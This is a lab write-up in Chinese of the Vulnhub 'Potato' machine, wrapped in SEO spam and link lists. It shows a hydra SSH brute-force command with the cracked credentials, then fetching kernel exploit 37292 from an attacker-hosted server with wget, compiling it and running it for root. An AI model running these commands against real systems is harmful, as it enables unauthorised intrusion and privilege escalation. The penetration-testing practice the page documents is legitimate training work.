当前位置: 首页 > news >正文

移动互联网开发的学习心得百度搜索排名优化

移动互联网开发的学习心得,百度搜索排名优化,专业的网站制作开发公司,哪个网站学做真账比较好信息搜集 设备发现 扫描端口 综合扫描 开放了80端口的HTTP服务和7120端口的SSH服务 目录扫描 扫描目录 看看这个info.php,发现只有php的版本信息,没有可以利用的注入点 SSH突破 hydra 爆破 考虑到 7120 端口是 ssh 服务,尝试利用 hydra …

信息搜集

设备发现

扫描端口

综合扫描

开放了80端口的HTTP服务和7120端口的SSH服务

目录扫描

扫描目录

看看这个info.php,发现只有php的版本信息,没有可以利用的注入点

 SSH突破

hydra 爆破

考虑到 7120 端口是 ssh 服务,尝试利用 hydra 进行 ssh 爆破,得到用户名:potato 密码:letmein

hydra -l potato -P top1000.txt -V ssh://192.168.88.138:7120

ssh渗透提权

用拿到 ssh 用户名和密码,登录 ssh 

id查看发现是一个普通用户;uname -a查看发现ubuntu的版本很老,只有3.13.0

查看 Linux 内核信息,搜索后发现存在 exp,也可以searchsploit ubuntu 3.13.3,使用第一个漏洞进行攻击

使用该漏洞,

将漏洞传到靶机上,这里我们在kali上建立apache服务器,让目标主机通过网络将漏洞下载到本机上

service apache2 start   ---------开启服务器ss -tunlp                       ----------查看开启端口

将漏洞下载到服务器目录下

cd /var/www/html
searchsploit -m 37292 

使用目标靶机下载服务器上的漏洞

wget http://192.168.88.128/37292.c 

运行脚本提权

gcc 37292.c -o exp ----------编译脚本
chmod +777 exp -----------更改权限
./exp -------------执行脚本

提高交互性并且拿到root权限

找到flag,拿下

参考博客:

Potato靶机测试-CSDN博客

Vulnhub靶机实战-POTATO-WP_维梓-的博客-CSDN博客

http://www.yidumall.com/news/98959.html

相关文章:

  • 沈阳化工大学建设工程全专业优化公司
  • 网站 目标seo怎么做教程
  • 吉安做网站优化珠海seo排名收费
  • 秦皇岛市建设路小学网站站长之家素材网
  • ps设计网站百度指数查询入口
  • 如何做网站逻辑结构图百度招商加盟推广
  • 政府网站建设 领导重视上海网站排名优化怎么做
  • 杭州模板网站制作方案seo是什么及作用
  • 从0到建网站深圳优化公司
  • 网站策划与建设阶段的推广百度网址是多少 百度知道
  • 百度公司网站怎么建设目前最好的营销模式
  • 医疗网站怎么做seo网络销售都是诈骗公司吗
  • 域名和主机有了怎么做网站站长工具seo优化
  • 免费做网站怎么做网站吗2百度百科怎么创建自己
  • 河源哪有做网站如何优化搜索引擎的搜索功能
  • wordpress整合百度站内搜索我要软文网
  • 安徽网站建设怎么样seo关键词软件
  • 政府网站建设的执行标准编号百度指数数据分析报告
  • 天津百度优化公司站长工具seo综合查询推广
  • app软件做得比较好的公司排名长沙seo优化公司
  • 太平洋手机网seo sem是什么职位
  • 北京机建网站成都网络推广运营公司
  • wordpress企业仿站视频教程百度销售系统登录
  • 山东食品行业网站开发想做电商怎么入手
  • 网站空间的参数通州优化公司
  • 建设银行网网站在线智能识图
  • 网站alexa流量查询关键词免费网站
  • 建设银行网上银行网站网站注册地址查询
  • 小程序前后端开发电脑系统优化软件
  • 微山做网站临沂seo